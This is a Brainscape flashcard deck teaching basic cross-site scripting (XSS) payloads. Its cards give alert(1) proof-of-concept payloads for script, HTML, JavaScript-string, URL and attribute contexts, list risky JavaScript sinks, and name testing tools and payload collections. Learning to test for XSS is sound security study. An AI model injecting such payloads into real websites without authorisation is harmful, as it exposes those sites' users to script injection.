Brainscape's Knowledge GenomeTM


Top Flashcards (Certified)
All Flashcards

XSS Flashcards > XSS Payload Flashcards > Flashcards

XSS Payload Flashcards

(10 cards)

Start Studying
1
Q

What is the basic payload structure for Reflected XSS?

A 
<script>
alert(1)
</script>
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

What payload works well in an HTML context?

A

<img src=x onerror=alert(1)>

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

What payload works when injected into a JavaScript string?

A

’);alert(1);//

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

What payload can be used inside a link or URL context?

A

javascript:alert(1)

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

What payload is used in attribute injection (e.g., inside a tag)?

A

onmouseover=alert(1)

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

Which JavaScript sinks should raise red flags for XSS?

A

innerHTML, document.write(), eval(), setTimeout(), location.href

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

What tool can help generate and test XSS payloads?

A

Burp Suite (Intruder) or XSS cheat sheets

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

What should you do instead of memorizing every payload?

A

Understand context, maintain a personal payload bank

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

What GitHub resource provides common payloads for XSS?

A

PayloadAllTheThings

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q

What mindset helps with building payloads on the fly?

A

Learn how browsers parse input and recognize injection contexts

How well did you know this?
1
Not at all
2
3
4
5
Perfectly

XSS Flashcards (2 decks)

Brainscape helps you reach your goals faster, through stronger study habits.
© 2025 Bold Learning Solutions. Terms and Conditions